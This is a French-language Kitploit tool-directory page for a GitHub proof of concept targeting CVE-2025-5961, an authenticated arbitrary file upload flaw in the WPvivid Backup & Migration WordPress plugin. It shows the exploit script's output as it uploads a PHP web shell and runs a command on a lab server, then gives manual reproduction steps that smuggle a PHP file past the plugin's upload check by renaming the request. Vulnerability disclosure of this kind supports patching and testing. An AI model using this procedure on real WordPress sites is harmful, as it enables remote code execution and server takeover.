Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5961 — Migration, Sauvegarde, Préproduction – WPvivid Backup & Migration <= 0.9.116 - Authentifié (Administrateur+) Téléchargement arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/d0n601/cve-2025-5961
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubd0n601/cve-2025-5961

CVE-2025-5961

Migration, Sauvegarde, Préproduction – WPvivid Backup & Migration <= 0.9.116 - Authentifié (Administrateur+) Téléchargement arbitraire de fichiers

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5961

Migration, Sauvegarde, Mise en scène – WPvivid Backup & Migration <= 0.9.116 - Téléchargement arbitraire de fichiers authentifié (Administrateur+)

Le plugin wpvivid-backuprestore ne nettoie pas les types de fichiers de l'action wpvivid_upload_import_files, permettant aux administrateurs et au-dessus de télécharger des fichiers arbitraires et potentiellement obtenir une exécution de code sur le serveur. REMARQUE : Les fichiers téléchargés ne sont accessibles que sur les instances WordPress fonctionnant sur le serveur web NGINX, car le fichier .htaccess existant dans le dossier de téléchargement cible empêche l'accès sur les serveurs Apache.

TL;DR Exploits

  • Un POC CVE-2025-5961.py est fourni pour démontrer un administrateur téléchargeant un web shell nommé hack.php.
root@kitploit:~
 python3 ./CVE-2025-5961.py https://lab1.hacker admin password
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
ajax_nonce: e4d4bec9f0
Uploading web shell: hack.php
{"result":"success"}

Web Shell At: https://lab1.hacker/wp-content/wpvividbackups/ImportandExport/hack.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 78309sec preferred_lft 78309sec
    inet6 fd00::a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86105sec preferred_lft 14105sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:63:2d:a4:f2 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Détails

L'action wpvivid_upload_import_files appelle la fonction upload_files à la ligne 2210 de /wp-content/plugins/wpvivid-backuprestore/includes/class-wpvivid-export-import.php sans imposer de validation de type de fichier.

Ligne 2235 $file_name est définie comme suit :

root@kitploit:~
$file_name=basename(sanitize_text_field($_POST['name']));

La variable $file_name est ensuite utilisée à la ligne 2246 pour écrire le fichier dans le système de fichiers.

root@kitploit:~
$file_handle = fopen($path.$file_name, 'wb');

Reproduction manuelle

  1. Créez un fichier malveillant pour passer la validation front-end puisque nous le faisons manuellement. Entrez ceci dans le terminal :
root@kitploit:~
echo "<?php phpinfo(); ?>" >>  wpvivid-0000000000000_1969-04-20-00-00_export_post.zip
  1. Connectez-vous au panneau d'administration et accédez à l'onglet WPvivid Backup.
  2. Sélectionnez l'option Export & Import dans le menu latéral, puis sélectionnez l'onglet Import.
  3. Démarrez Burp Suite ou un outil similaire et commencez à intercepter le trafic.
  4. Cliquez sur le bouton Upload and Import, et sélectionnez le fichier wpvivid-0000000000000_1969-04-20-00-00_export_post.zip que nous avons créé à l'étape zéro. test1
  5. La première requête POST contiendra quelque chose comme ceci, transmettez cette requête :
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
...
...
...
action=wpvivid_check_import_file&file_name=wpvivid-0000000000000_1969-04-20-00-00_export_post.zip&nonce=5c83c6b97b
  1. Modifiez la requête suivante contenant les données du formulaire pour définir le nom du fichier à poc.php : test2
  2. Accédez à https://THEWEBSITE.com/wp-content/wpvividbackups/ImportandExport/poc.php pour exécuter la preuve de concept. test3
Télécharger l’outil